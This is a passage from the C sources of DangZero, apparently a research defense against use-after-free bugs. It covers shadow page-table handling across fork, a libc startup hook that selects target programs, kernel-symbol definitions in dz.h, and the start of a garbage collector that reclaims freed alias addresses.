opt_freelist->items.lh_first != NULL){ 1306 | freelist_reset(opt_freelist); 1307 | __libc_free(opt_freelist); 1308 | } 1309 | #ifdef __GC_PT_COMPRESS 1310 | // return the memory of compression freelist 1311 | cpt_destruct(); 1312 | #endif 1313 | #endif 1314 | #ifdef __TRACK_SHADOW_SIZE 1315 | process=0; 1316 | if(shw_fp != NULL) fclose(shw_fp); 1317 | process=1; 1318 | #endif 1319 | // printf("[DangZero]: Destructor done\n"); 1320 | //fprintf(stderr, "[dangzero] destructor exit\n"); 1321 | //fflush(stderr); 1322 | } 1323 | } 1324 | 1325 | void apply_fork_map(uintptr_t* p_cr3, struct map_pa_va* addr_map, size_t num_addrs) 1326 | { 1327 | // we need to create the shadow 
tables again in the current process 1328 | // and additionally need new physical backing for each PTE 1329 | 1330 | #ifdef __GC 1331 | uintptr_t end_addr = highest_shadow; 1332 | #else 1333 | uintptr_t end_addr = free_span.start; // until the next free spot 1334 | #endif 1335 | 1336 | uintptr_t cur_addr = SHADOW_BASE; 1337 | 1338 | unsigned short pml4_index=PML4_SHADOW_START, pdpt_index, pde_index, pte_index; 1339 | unsigned short max_pml4=PML4_INDEX(end_addr); 1340 | uintptr_t *pdpt, *pde, *pte; 1341 | uintptr_t *c_pdpt, *c_pde, *c_pte; 1342 | size_t i = 0; 1343 | size_t store_i; 1344 | phys_addr_t p_pa; 1345 | phys_addr_t last_pa = 0; 1346 | phys_addr_t cow_back = 0; 1347 | volatile int8_t tmp; // volatile for -O2 1348 | 1349 | while(pml4_index <= max_pml4){ 1350 | // get and copy pdpt 1351 | pdpt = get_table_page(p_cr3, pml4_index); 1352 | if(pdpt == NULL) { pml4_index++; cur_addr+=PML4_ADDR_OFFSET; continue; } 1353 | c_pdpt = create_page_table(g_cr3, pml4_index); 1354 | 1355 | pdpt_index = 0; 1356 | while(pdpt_index < 512){ 1357 | // get and copy pde 1358 | pde = get_table_page(pdpt, pdpt_index); 1359 | if(pde == NULL) { pdpt_index++; cur_addr+=PDPT_ADDR_OFFSET; continue; } 1360 | c_pde = create_page_table(c_pdpt, pdpt_index); 1361 | 1362 | pde_index = 0; 1363 | while(pde_index < 512){ 1364 | // get and copy pte 1365 | pte = get_table_page(pde, pde_index); 1366 | if(pte == NULL) { pde_index++; cur_addr+=PDE_ADDR_OFFSET; continue; } 1367 | c_pte = create_page_table(c_pde, pde_index); 1368 | 1369 | pte_index = 0; 1370 | while(pte_index < 512){ 1371 | // pte+pte_index points to phys page 1372 | if(*(pte+pte_index) & PAGE_PRESENT){ 1373 | // phys page is present 1374 | p_pa = *(pte+pte_index) & PAGE_FRAME; 1375 | uint64_t flags = *(pte+pte_index) & ~(PAGE_FRAME); 1376 | 1377 | // obj not shared on prev pa 1378 | if(p_pa != last_pa){ 1379 | 1380 | // although PA may not be contiguous, VAs are, and shadows are often in sync with VAs 1381 | store_i = i; 1382 | int skip_2nd_loop = 0; 1383 | if(i > 0) 1384 | i += 1; 1385 | 1386 | for(; i < num_addrs; i++){ 1387 | if(addr_map[i].pa == p_pa){ 1388 | // in the child, access the VA to cause CoW backing 1389 | tmp = *((int8_t*)addr_map[i].va); 1390 | *((int8_t*)addr_map[i].va) = tmp; 1391 | 1392 | // look up the physical addr of the new backing 1393 | cow_back = get_phys_addr_user(addr_map[i].va); 1394 | 1395 | // store PA in case next shadow shares it 1396 | last_pa = p_pa; 1397 | 1398 | // found after prev 1399 | skip_2nd_loop = 1; 1400 | break; 1401 | } 1402 | } 1403 | 1404 | if(!skip_2nd_loop){ 1405 | // continue search from 0 to previously found index 1406 | for(i = 0; i < store_i; i++){ 1407 | if(addr_map[i].pa == p_pa){ 1408 | tmp = *((int8_t*)addr_map[i].va); 1409 | *((int8_t*)addr_map[i].va) = tmp; 1410 | cow_back = get_phys_addr_user(addr_map[i].va); 1411 | last_pa = p_pa; 1412 | break; 1413 | } 1414 | } 1415 | } 1416 | } 1417 | 1418 | // update child shadow pte to the new physical backing 1419 | if(cow_back != 0){ 1420 | // make the child shadow point there 1421 | // *(c_pte+pte_index) = (cow_back & PAGE_FRAME) | PAGE_PRESENT | PAGE_WRITABLE; 1422 | *(c_pte+pte_index) = (cow_back & PAGE_FRAME) | flags; 1423 | 1424 | // flush TLB not needed here in fresh process shadow table 1425 | // fprintf(stderr, "fork (%p) VA=%p PA=%p > COW=%p\n", cur_addr, (void*)addr_map[i].va, (void*)p_pa, (void*)(cow_back & PAGE_FRAME)); 1426 | //printf("Fork: VA=%p PA=%p > COW=%p\n", (void*)addr_map[i].va, (void*)p_pa, (void*)(cow_back & PAGE_FRAME)); 1427 | } 
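// note: distinct shadow PTEs can alias the same canonical physical page (one
// shadow page per object living on that page), so when consecutive entries
// share a PA the p_pa != last_pa check above skips the addr_map search and
// reuses the cow_back found for the previous entry.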
1428 | } 1429 | 1430 | cur_addr += PAGE_SIZE; 1431 | if(cur_addr >= end_addr){ 1432 | // fprintf(stderr, "reached the end of shadows: %p\n", (void*)cur_addr); 1433 | #ifdef __GC 1434 | // unset last_sync on all spans 1435 | // force resync if fragmented 1436 | // otherwise realign below is enough 1437 | 1438 | struct vp_span *span; 1439 | /*if(opt_freelist != NULL && opt_freelist->items.lh_first != NULL){ 1440 | LIST_FOREACH(span, &(opt_freelist->items), freelist) { 1441 | span->last_sync = false; 1442 | } 1443 | }*/ 1444 | 1445 | struct vp_freelist *new_list = __libc_malloc(sizeof(struct vp_freelist)); 1446 | memset(new_list, 0, sizeof(struct vp_freelist)); 1447 | if(opt_freelist != NULL){ 1448 | LIST_FOREACH(span, &(opt_freelist->items), freelist){ 1449 | freelist_free(new_list, (void*)span->start, span_num_pages(span)); 1450 | } 1451 | } 1452 | opt_freelist = new_list; 1453 | cur_span = NULL; 1454 | 1455 | // re-alloc freelist with kmalloc 1456 | // since CoW is not triggered on freelist 1457 | #ifdef __GC_PT_COMPRESS 1458 | cpt_nuke(); 1459 | #endif 1460 | #endif 1461 | // realign free_span 1462 | last_pdpt = c_pdpt; 1463 | last_pde = c_pde; 1464 | last_pte = c_pte; 1465 | last_pml4_index = pml4_index; 1466 | last_pdpt_index = pdpt_index; 1467 | last_pde_index = pde_index; 1468 | last_pte_index = pte_index; 1469 | return; 1470 | } 1471 | pte_index++; 1472 | } 1473 | pde_index++; 1474 | } 1475 | pdpt_index++; 1476 | } 1477 | } 1478 | } 1479 | 1480 | #ifdef __ENABLE_FORK_SUPPORT 1481 | pid_t fork(void) 1482 | { 1483 | if(process) 1484 | { 1485 | //printf("[wrap]: fork caught\n"); 1486 | //fprintf(stderr, "enter fork\n"); 1487 | //fflush(stderr); 1488 | 1489 | // create sync for this fork (libc malloc - no instrument) 1490 | fork_sync = mmap(NULL, sizeof(struct _fork_sync), PROT_READ|PROT_WRITE, MAP_SHARED|MAP_ANONYMOUS, -1, 0); 1491 | pthread_mutex_init(&fork_sync->mutex, &fork_mutex_attr); 1492 | pthread_cond_init(&fork_sync->cond, &fork_cond_attr); 1493 | fork_sync->copy_done = 0; 1494 | 1495 | //fflush(stderr); 1496 | 1497 | pid_t pid = __libc_fork(); 1498 | if(pid == 0){ 1499 | // child: save parent cr3 1500 | uintptr_t* parent_cr3 = g_cr3; 1501 | 1502 | // call into kernel module 1503 | size_t num_addrs; 1504 | struct map_pa_va* addr_map; 1505 | addr_map = dangzero_create_fork_map(parent_cr3, &num_addrs); 1506 | if(addr_map == NULL){ 1507 | printf("fatal: could not create fork map in kmod!\n"); 1508 | return -1; 1509 | } 1510 | //printf("Obtained addr map of size %lu\n", num_addrs); 1511 | //fprintf(stderr, "fork addr map size: %lu\n", num_addrs); 1512 | 1513 | // update global cr3 for child 1514 | phys_addr_t ccr3; 1515 | asm("movq %%cr3, %0" : "=r" (ccr3)); 1516 | g_cr3 = phys_to_virt(ccr3); 1517 | 1518 | //printf("[wrap] child CR3=%p, parent CR3=%p\n", g_cr3, parent_cr3); 1519 | 1520 | // copy shadow tables 1521 | apply_fork_map(parent_cr3, addr_map, num_addrs); 1522 | 1523 | // free the kmod allocated mapping 1524 | kfree(addr_map); 1525 | 1526 | // wake the parent 1527 | pthread_mutex_lock(&fork_sync->mutex); 1528 | fork_sync->copy_done = 1; 1529 | pthread_cond_signal(&fork_sync->cond); 1530 | //printf("[set to 1, signal raised]\n"); 1531 | pthread_mutex_unlock(&fork_sync->mutex); 1532 | 1533 | // clear fork_sync 1534 | munmap(fork_sync, sizeof(struct _fork_sync)); 1535 | //fprintf(stderr, "fork done\n"); 1536 | } 1537 | else{ 1538 | // parent: wait for child to finish copy 1539 | pthread_mutex_lock(&fork_sync->mutex); 1540 | while(!(fork_sync->copy_done)){ 1541 | 
//printf("[enter wait loop]\n"); // cannot print with cow here 1542 | pthread_cond_wait(&fork_sync->cond, &fork_sync->mutex); 1543 | //printf("[exit wait]\n"); 1544 | } 1545 | pthread_mutex_unlock(&fork_sync->mutex); 1546 | 1547 | // clear fork_sync 1548 | munmap(fork_sync, sizeof(struct _fork_sync)); 1549 | } 1550 | 1551 | return pid; 1552 | } 1553 | return __libc_fork(); 1554 | } 1555 | #endif 1556 | 1557 | #ifdef __CVE_MODE 1558 | void handler(int sig, siginfo_t* si, void* vcontext) 1559 | { 1560 | uintptr_t addr = (uintptr_t)si->si_addr; 1561 | if(addr >= SHADOW_BASE){ 1562 | fprintf(stderr, "Segfault at: %p\n", si->si_addr); 1563 | // look up pte and check if invalidated 1564 | uintptr_t *pdpt, *pde, *pte; 1565 | unsigned short pml4_index, pdpt_index, pde_index, pte_index; 1566 | 1567 | pml4_index = PML4_INDEX(addr); 1568 | pdpt = get_table_page(g_cr3, pml4_index); //pdpt=cr3+pml4_index 1569 | if(UNLIKELY(pdpt == NULL)) _exit(0); 1570 | 1571 | pdpt_index = PDPT_INDEX(addr); 1572 | pde = get_table_page(pdpt, pdpt_index); //pde=pdpt+pdpt_index 1573 | if(UNLIKELY(pde == NULL)) _exit(0); 1574 | 1575 | pde_index = PDE_INDEX(addr); 1576 | pte = get_table_page(pde, pde_index); //pte=pde+pde_index 1577 | if(UNLIKELY(pte == NULL)) _exit(0); 1578 | 1579 | pte_index = PTE_INDEX(addr); 1580 | 1581 | if(*(pte+pte_index) & PTE_INVALIDATED){ 1582 | fprintf(stderr, "PTE was invalidated\n"); 1583 | } 1584 | else{ 1585 | fprintf(stderr, "PTE still active...\n"); 1586 | } 1587 | } 1588 | else{ 1589 | fprintf(stderr, "Unknown segfault at %p\n", si->si_addr); 1590 | } 1591 | fflush(stderr); 1592 | _exit(0); 1593 | } 1594 | #endif 1595 | 1596 | int8_t is_target(char *program, int argc, char** argv) 1597 | { 1598 | #ifdef __SPEC_MODE 1599 | if(strstr(program, "run_base")){ 1600 | #elif defined(__NGINX_MODE) 1601 | if(strstr(program, "nginx") || strstr(program, "lighttpd")){ 1602 | #elif defined(__JULIET_MODE) 1603 | if(strstr(program, "CWE")){ 1604 | #elif defined(__CVE_MODE) 1605 | if(strstr(program, "consume")){ 1606 | #else 1607 | if(strstr(program, "hello") || strstr(program, "/trusted/") || strstr(program, "dz_")){ 1608 | #endif 1609 | 1610 | //fukp = fopen("/home/u16/Documents/gclog.txt", "a"); 1611 | 1612 | //fprintf(stderr, "set target: %s\n", program); 1613 | /*char filename[256]; 1614 | unsigned long t = time(NULL); 1615 | sprintf(filename, "%sout_%lu.txt", LOG_PATH, t); 1616 | fp = fopen(filename, "w"); 1617 | if(!fp) return 0;*/ 1618 | 1619 | //printf("[DangZero]: Target set: %s\n", program); 1620 | /* int a; 1621 | for(a = 0; a < argc; a++){ 1622 | fprintf(stderr, "argv %d: %s\n", a, argv[a]); 1623 | }*/ 1624 | 1625 | #ifdef __CVE_MODE 1626 | // segfault handler 1627 | struct sigaction action; 1628 | memset(&action, 0, sizeof(struct sigaction)); 1629 | action.sa_flags = SA_SIGINFO; 1630 | action.sa_sigaction = handler; 1631 | sigaction(SIGSEGV, &action, NULL); 1632 | #endif 1633 | 1634 | // global process cr3 1635 | phys_addr_t pcr3; 1636 | asm("movq %%cr3, %0" : "=r" (pcr3)); 1637 | g_cr3 = phys_to_virt(pcr3); 1638 | 1639 | #ifdef __GC 1640 | opt_freelist = __libc_malloc(sizeof(struct vp_freelist)); 1641 | memset(opt_freelist, 0, sizeof(struct vp_freelist)); 1642 | struct vp_span *span = WM_ALLOC(sizeof(struct vp_span)); 1643 | span->start = SHADOW_BASE; 1644 | span->end = SHADOW_END; 1645 | span->last_sync = true; // set up below 1646 | cur_span = span; 1647 | LIST_INSERT_HEAD(&opt_freelist->items, span, freelist); 1648 | #endif 1649 | 1650 | // if-not-GC? 
1651 | // set free span 1652 | free_span.start = SHADOW_BASE; 1653 | free_span.end = SHADOW_END; 1654 | 1655 | // set up page walk ptrs 1656 | last_pdpt = step_shadow_table(g_cr3, PML4_SHADOW_START); 1657 | last_pde = step_shadow_table(last_pdpt, 0); 1658 | last_pte = step_shadow_table(last_pde, 0); 1659 | 1660 | __posix_memalign = (proto_posix_memalign) dlsym(RTLD_NEXT, "posix_memalign"); 1661 | 1662 | #ifdef __ENABLE_FORK_SUPPORT 1663 | // look up kernel module function 1664 | dangzero_create_fork_map = (proto_dangzero_create_fork_map) kallsyms_lookup_name("dangzero_create_fork_map"); 1665 | if(!dangzero_create_fork_map){ 1666 | printf("[fatal!!] DangZero Kmod lookup fork failed.\n"); 1667 | fflush(stdout); 1668 | fprintf(stderr, "[fatal!!] DangZero Kmod lookup fork failed.\n"); 1669 | fflush(stderr); 1670 | return 0; 1671 | } 1672 | 1673 | // set up attributes for fork sync 1674 | pthread_mutexattr_init(&fork_mutex_attr); 1675 | pthread_condattr_init(&fork_cond_attr); 1676 | pthread_mutexattr_setpshared(&fork_mutex_attr, PTHREAD_PROCESS_SHARED); 1677 | pthread_condattr_setpshared(&fork_cond_attr, PTHREAD_PROCESS_SHARED); 1678 | #endif 1679 | 1680 | #ifdef __GC 1681 | dangzero_find_vma_bounds = (proto_dangzero_find_vma_bounds) kallsyms_lookup_name("dangzero_find_vma_bounds"); 1682 | dangzero_mark_heap = (proto_dangzero_mark_heap) kallsyms_lookup_name("dangzero_mark_heap"); 1683 | if(!dangzero_find_vma_bounds || !dangzero_mark_heap){ 1684 | fprintf(stderr, "cannot find gc heap dangmod\n"); 1685 | return 0; 1686 | } 1687 | #endif 1688 | 1689 | //fprintf(stderr, "set target done\n"); 1690 | return 1; 1691 | } 1692 | return 0; 1693 | } 1694 | 1695 | typedef int (*main_t)(int, char, char); 1696 | typedef int (*libc_start_main_t)(main_t main, int argc, char** ubp_av, 1697 | void (*init)(void), void (*fini)(void), void (*rtld_fini)(void), void* stack_end); 1698 | 1699 | int __libc_start_main(main_t main, int argc, char** ubp_av, 1700 | void (*init)(void), void (*fini)(void), void (*rtld_fini)(void), void* stack_end) 1701 | { 1702 | libc_start_main_t og_libc_start_main = (libc_start_main_t)dlsym(RTLD_NEXT, "__libc_start_main"); 1703 | process = is_target(ubp_av[0], argc, ubp_av); 1704 | og_libc_start_main(main, argc, ubp_av, init, fini, rtld_fini, stack_end); 1705 | 1706 | } 1707 | -------------------------------------------------------------------------------- /dz.h: -------------------------------------------------------------------------------- 1 | #ifndef DANGZERO_H 2 | #define DANGZERO_H 3 | #define LOG(...) //printf(__VA_ARGS__) 4 | #define LIKELY(COND) __builtin_expect((COND), 1) 5 | #define UNLIKELY(COND) __builtin_expect((COND), 0) 6 | #define PAGE_SIZE 4096 7 | 8 | #define __GC 9 | #define __GC_PT_COMPRESS 10 | //#define __GC_WATERMARK (10000000ULL) // pages 11 | #define NUM_BUCKETS 10000 12 | #define WM_ALLOC(sz) kmalloc(sz, GFP_NOWAIT) 13 | //#define WM_ALLOC(sz) __libc_malloc(sz) 14 | #define WM_FREE(ptr) kfree(ptr) 15 | //#define WM_FREE(ptr) __libc_free(ptr) 16 | //#define WM_ZERO 17 | 18 | // regular malloc for WM is useful for memory overhead measurements 19 | 20 | //#define __PT_RECLAIM 21 | 22 | //#define __TRACK_SHADOW_SIZE 23 | #define OUTPUT_FREQ 100000 // every n allocs output shadow sz 24 | 25 | //#define __TRACK_MEM_USAGE 26 | //#define __SANITY_CHECK 27 | #define __ENABLE_FORK_SUPPORT 28 | 29 | // page table indexing 30 | #define PAGE_MASK (~(PAGE_SIZE-1)) // to disable the page flags (e.g. 
0x20d4067 -> 0x20d4000) 31 | #define PAGE_FRAME 0x000ffffffffff000UL 32 | #define PAGE_MASK_INDEX 0x1FF // 511 33 | #define MAX_PAGE_INDEX 511 34 | #define PML4_INDEX(x) ((x >> 39) & PAGE_MASK_INDEX) 35 | #define PDPT_INDEX(x) ((x >> 30) & PAGE_MASK_INDEX) 36 | #define PDE_INDEX(x) ((x >> 21) & PAGE_MASK_INDEX) 37 | #define PTE_INDEX(x) ((x >> 12) & PAGE_MASK_INDEX) 38 | 39 | #define PML4_ADDR_OFFSET 0x8000000000 40 | #define PDPT_ADDR_OFFSET 0x40000000 41 | #define PDE_ADDR_OFFSET 0x200000 42 | 43 | // arch/x86/include/asm/pgtable_types.h 44 | #define PAGE_PRESENT 1 45 | #define PAGE_WRITABLE 2 46 | #define PAGE_DIRTY (1 << 6) 47 | #define PAGE_HUGE (1 << 7) 48 | 49 | // arch/x86/include/asm/page_64_types.h: 50 | #define PAGE_OFFSET 0xffff880000000000UL 51 | #define __START_KERNEL_map 0xffffffff80000000UL 52 | typedef uint64_t phys_addr_t; 53 | 54 | /* 55 | > the gap for direct mapping of all physical memory is 64TB 56 | > that is: 0xffff888000000000 ~ 0xffffc87fffffffff 57 | > the corresponding PML4s are entries 273 ~ 400 58 | > note that PML4E 272 is used for the guard hole for hypervisor (and seems present on QEMU) 59 | > assuming the system uses 27 x 512 GB physical memory at most (which is insane) 60 | > we start our shadow mapping at PML4E 300 (300 << 39 == 0xffff960000000000) 61 | > and it ends including PML4E 400 (0xffffc87fffffffff) 62 | > this gives us a little over 50 TB of PT shadow space (about 12.5 billion shadow pages) 63 | */ 64 | #define PML4_SHADOW_START 300 65 | #define PML4_SHADOW_END 400 66 | #define SHADOW_BASE 0xffff960000000000 67 | #define SHADOW_END 0xffffc88000000000 //0xffffc87fffffffff 68 | 69 | void* __libc_malloc(size_t size); 70 | void* __libc_calloc(size_t nmemb, size_t size); 71 | void* __libc_realloc(void* ptr, size_t size); 72 | void* __libc_memalign(size_t alignment, size_t size); 73 | void* __libc_free(void* ptr); 74 | #ifdef __ENABLE_FORK_SUPPORT 75 | pid_t __libc_fork(void); 76 | #endif 77 | 78 | // monica vm 79 | // kernel function symbols (obtained through command "nm vmlinux" or "sudo cat /proc/kallsyms" 80 | /*#define SYMBOL_ADDR_get_zeroed_page 0xffffffff811131a0 81 | #define SYMBOL_ADDR_free_pages 0xffffffff81115bc0 82 | #define SYMBOL_ADDR___get_free_pages 0xffffffff81113160 83 | #define SYMBOL_ADDR_kallsyms_lookup_name 0xffffffff810bd350 84 | #define SYMBOL_ADDR_kfree 0xffffffff811593c0 85 | #define SYMBOL_ADDR_kmalloc 0xffffffff81159070 86 | */ 87 | 88 | #define SYMBOL_ADDR_get_zeroed_page 0xffffffff811635d0//0xffffffff811131a0 89 | #define SYMBOL_ADDR_free_pages 0xffffffff81166480//0xffffffff81115bc0 90 | #define SYMBOL_ADDR___get_free_pages 0xffffffff81163580//0xffffffff81113160 91 | #define SYMBOL_ADDR_kallsyms_lookup_name 0xffffffff810e3870//0xffffffff810bd350 92 | #define SYMBOL_ADDR_kfree 0xffffffff811b4b40//0xffffffff811593c0 93 | #define SYMBOL_ADDR_kmalloc 0xffffffff811b5c40 94 | 95 | // dangzero kernel module 96 | typedef struct map_pa_va* (*proto_dangzero_create_fork_map)(uintptr_t* cr3, size_t* n); 97 | proto_dangzero_create_fork_map dangzero_create_fork_map; 98 | 99 | // kernel functions 100 | typedef unsigned long (*proto_get_zeroed_page)(unsigned int); 101 | typedef void (*proto_free_pages)(unsigned long addr, unsigned int order); 102 | typedef unsigned long (*proto___get_free_pages)(unsigned mask, unsigned int order); 103 | typedef void (*proto_kfree)(const void*); 104 | typedef void* (*proto_kmalloc)(size_t size, unsigned flag); 105 | // include/linux/kallsyms.h 106 | typedef unsigned long 
(*proto_kallsyms_lookup_name)(const char* name); 107 | 108 | // linux-4.0/include/linux/gfp.h 109 | #define GFP_NOWAIT 0 110 | #define GFP_KERNEL 208 111 | 112 | // arch/x86/include/asm/io.h: 113 | // only valid to use this function on addresses directly mapped or allocated via kmalloc 114 | static phys_addr_t virt_to_phys(volatile void* address) 115 | { 116 | return (phys_addr_t)address - PAGE_OFFSET; 117 | } 118 | 119 | static void* phys_to_virt(phys_addr_t address) 120 | { 121 | return (void*)(address + PAGE_OFFSET); 122 | } 123 | 124 | #ifdef __GC 125 | struct vp_span { 126 | uint64_t start; 127 | uint64_t end; 128 | bool last_sync; // page walk optimization 129 | LIST_ENTRY(vp_span) freelist; 130 | }; 131 | 132 | struct vp_freelist { 133 | // Singly-linked list of vp_span objects, ordered by span->end (ascending) 134 | LIST_HEAD(, vp_span) items; 135 | }; 136 | 137 | //uint64_t freelist_size(); 138 | int freelist_free(struct vp_freelist *list, void *p, size_t npages); 139 | struct vp_span *try_merge_spans(struct vp_span *left, struct vp_span *right); 140 | #endif 141 | 142 | 143 | #ifdef __TRACK_SHADOW_SIZE 144 | void output_shadow_size(bool gc); 145 | #endif 146 | uintptr_t* create_page_table(uintptr_t* table, unsigned short entry); 147 | static uintptr_t* get_table_page(uintptr_t* table, unsigned short index); 148 | static uintptr_t* get_table_page_nocheck(uintptr_t* table, unsigned short index); 149 | phys_addr_t get_phys_addr_user(uintptr_t addr); 150 | #ifdef __GC_PT_COMPRESS 151 | uintptr_t* step_shadow_table_L2cpt(uintptr_t* table, unsigned short index); 152 | #endif 153 | uintptr_t* step_shadow_table(uintptr_t* table, unsigned short index); 154 | void disable_shadow_one(uintptr_t addr); 155 | void disable_shadows(uintptr_t base, size_t num_pages); 156 | uintptr_t* create_shadow_one(uintptr_t canon, size_t offset); 157 | uintptr_t* create_shadows(uintptr_t canon, size_t num_pages, size_t offset); 158 | 159 | #endif 160 | -------------------------------------------------------------------------------- /gc.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Collector for freed objects, to allow for reuse of virtual addresses in alias 3 | * space. 4 | * 5 | * We scan all alive memory (regs, stack, data, alive heap objects) for (things 6 | * that look like) pointers to the aliassed heap during the marking phase. 7 | * Then we perform a sweep where each object that was freed and not marked is 8 | * given back to the alias allocator for reuse. 9 | * 10 | * We reuse the page tables as data structures for GC administration (e.g., 11 | * marking). 
12 | * 13 | * Originally created by Koen Koning (Dangless project) 14 | */ 15 | 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | 23 | //#define NDEBUG // disable assertions 24 | #include 25 | #define ASSERT0 assert 26 | 27 | #include "queue.h" 28 | #include "dz.h" 29 | #include "gc.h" 30 | 31 | #ifdef __GC 32 | extern uintptr_t* g_cr3; 33 | extern proto___get_free_pages __get_free_pages; 34 | extern proto_free_pages free_pages; 35 | extern uint64_t highest_shadow; 36 | extern struct vp_freelist* g_freelist; 37 | extern uint64_t bucket_size; 38 | extern bool fragmented; 39 | //extern unsigned curr_bucket; 40 | extern struct vp_freelist *opt_freelist; 41 | extern struct vp_span **sub_spans; 42 | extern proto_kfree kfree; 43 | extern proto_kmalloc kmalloc; 44 | 45 | #ifdef __TRACK_MEM_USAGE 46 | extern uint64_t max_pt_count; 47 | extern uint64_t curr_pt_count; 48 | #endif 49 | 50 | /* dangless functionality re-implemented */ 51 | static cpt_t *cpt_freelist; 52 | 53 | static inline unsigned pt_level_shift(enum pt_level level) { 54 | return PGSHIFT + (level - 1) * PT_BITS_PER_LEVEL; 55 | } 56 | 57 | static inline size_t pt_level_offset(vaddr_t va, enum pt_level level) { 58 | return (va >> pt_level_shift(level)) & (PT_NUM_ENTRIES - 1); 59 | } 60 | 61 | static inline u64 rcr3(void) { 62 | return (u64)g_cr3; 63 | } 64 | 65 | void *pt_paddr2vaddr(paddr_t pa) { 66 | return phys_to_virt(pa); 67 | } 68 | /* Upper 16 bits of addresses are sign-extended. */ 69 | static inline vaddr_t sext(vaddr_t va) 70 | { 71 | if (va & (1UL << 47)) 72 | va |= 0xffff800000000000UL; 73 | return va; 74 | } 75 | // Calculates the number of 4K pages mapped by an entry at the given pagetable level. 76 | static inline size_t pt_num_mapped_pages(enum pt_level level) { 77 | return 1uL << ((level - 1) * PT_BITS_PER_LEVEL); 78 | } 79 | /* end of dangless re-implemented */ 80 | 81 | 82 | static uintptr_t stack_top; 83 | static uintptr_t bss_start, bss_end; 84 | static uintptr_t data_start, data_end; 85 | 86 | /* 87 | * Generate variables in data and bss mappings so we can scan for their 88 | * addresses in proc maps. 89 | */ 90 | static int bss_seg_var = 0; 91 | static int data_seg_var = 1; 92 | 93 | 94 | static uintptr_t get_stack_pointer(void) 95 | { 96 | uintptr_t rsp; 97 | asm ("mov %%rsp, %0" : "=r"(rsp)); 98 | return rsp; 99 | } 100 | 101 | static inline bool is_potential_ptr(uintptr_t v) 102 | { 103 | return SHADOW_BASE <= v && v <= SHADOW_END; 104 | } 105 | 106 | ///// reclaiming (non-gc) ///// 107 | int pt_is_collectable(pte_t *pt) 108 | { 109 | unsigned pte_idx; 110 | 111 | for (pte_idx = 0; pte_idx < PT_NUM_ENTRIES; pte_idx++) 112 | if (!(pt[pte_idx] & PTE_INVALIDATED)) 113 | return 0; 114 | 115 | return 1; 116 | } 117 | 118 | static unsigned try_collect_pt_rec(vaddr_t va, 119 | vaddr_t va_end, 120 | enum pt_level level, 121 | pte_t *pt) 122 | { 123 | pte_t *ppte, *nextpt; 124 | size_t ptoff; 125 | paddr_t nextpt_pa; 126 | unsigned freed = 0, next_freed; 127 | 128 | vaddr_t va_level_next, va_level_end; 129 | size_t level_inc = 1UL << pt_level_shift(level); 130 | 131 | if (level == PT_L1) { 132 | //LOG("pt%d %p \n", level, pt); 133 | return 1; 134 | } 135 | 136 | while (va < va_end) { 137 | ptoff = pt_level_offset(va, level); 138 | va_level_next = (va + level_inc) & ~(level_inc - 1); 139 | va_level_end = va_end < va_level_next ? 
va_end : va_level_next; 140 | 141 | ppte = &pt[ptoff]; 142 | //LOG("pt%d va=%p pt=%p off=%zx pte=%lx\n", level, va, pt, ptoff, *ppte); 143 | if (!FLAG_ISSET(*ppte, PTE_P) || FLAG_ISSET(*ppte, PTE_PS)) 144 | return 0; 145 | 146 | nextpt_pa = *ppte & PTE_FRAME; 147 | nextpt = (pte_t*)pt_paddr2vaddr(nextpt_pa); 148 | 149 | next_freed = try_collect_pt_rec(va, va_level_end, level - 1, nextpt); 150 | 151 | if (next_freed == 512 || 152 | (next_freed > 0 && pt_is_collectable(nextpt))) { 153 | //LOG(" ########## pt%d empty, freeing %lx in pte %p\n", level - 1, 154 | // nextpt_pa, ppte); 155 | //virtual_invalidate_pte(ppte); 156 | *ppte = PTE_INVALIDATED | PTE_ALIASSES; 157 | 158 | //pp_free_one(nextpt_pa); 159 | free_pages((unsigned long)nextpt, 0); 160 | #ifdef __TRACK_MEM_USAGE 161 | curr_pt_count--; 162 | #endif 163 | freed++; 164 | 165 | //STATISTIC_UPDATE() { 166 | // st_num_pagetables_collected++; 167 | //} 168 | } 169 | va = va_level_next; 170 | 171 | //LOG("pt%d next va=%p end=%p next_freed=%u freed=%u\n", level, va, va_end, next_freed, freed); 172 | 173 | } 174 | 175 | return freed; 176 | } 177 | 178 | void try_collect_pt(vaddr_t va, size_t npages) 179 | { 180 | vaddr_t va_end = PG_OFFSET(va, npages); 181 | pte_t *ptroot = (pte_t*)g_cr3; 182 | //LOG("Collecting %lx - %lx (%zx pages)\n", va, va_end, npages); 183 | try_collect_pt_rec(va, va_end, PT_L4, ptroot); 184 | } 185 | 186 | 187 | ///// compression ///// 188 | static inline size_t cpt_bitnum_to_wordidx(size_t bitnum) 189 | { 190 | ASSERT0(bitnum < CPT_SIZE_BITS); 191 | return bitnum / (sizeof(uintptr_t) * 8); 192 | } 193 | static inline size_t cpt_bitnum_to_wordbit(size_t bitnum) 194 | { 195 | ASSERT0(bitnum < CPT_SIZE_BITS); 196 | return bitnum % (sizeof(uintptr_t) * 8); 197 | } 198 | static inline bool cpt_get_bit(cpt_t *cpt, size_t bitnum) 199 | { 200 | ASSERT0(bitnum < CPT_SIZE_BITS); 201 | uintptr_t *cpt_words = (uintptr_t *)cpt; 202 | uintptr_t word = cpt_words[cpt_bitnum_to_wordidx(bitnum)]; 203 | return (word >> cpt_bitnum_to_wordbit(bitnum)) & 1; 204 | } 205 | 206 | static inline void cpt_set_bit(cpt_t *cpt, size_t bitnum, bool val) 207 | { 208 | ASSERT0(bitnum < CPT_SIZE_BITS); 209 | ASSERT0(val == 0 || val == 1); 210 | uintptr_t *cpt_words = (uintptr_t *)cpt; 211 | uintptr_t *wordp = &cpt_words[cpt_bitnum_to_wordidx(bitnum)]; 212 | size_t bitpos = cpt_bitnum_to_wordbit(bitnum); 213 | *wordp = (*wordp & ~(1UL << bitpos)) | ((uintptr_t)val << bitpos); 214 | } 215 | 216 | bool cpt_get_entry(cpt_t *cpt, size_t idx, enum cpt_field field) 217 | { 218 | ASSERT0(idx < PT_NUM_ENTRIES); 219 | ASSERT0(field < CPT_NUM_FIELDS); 220 | return cpt_get_bit(cpt, idx * CPT_NUM_FIELDS + field); 221 | } 222 | 223 | void cpt_set_entry(cpt_t *cpt, size_t idx, enum cpt_field field, bool val) 224 | { 225 | ASSERT0(idx < PT_NUM_ENTRIES); 226 | ASSERT0(field < CPT_NUM_FIELDS); 227 | cpt_set_bit(cpt, idx * CPT_NUM_FIELDS + field, val); 228 | } 229 | 230 | // temp 231 | /*uint64_t cpt_size = 0; 232 | uint64_t 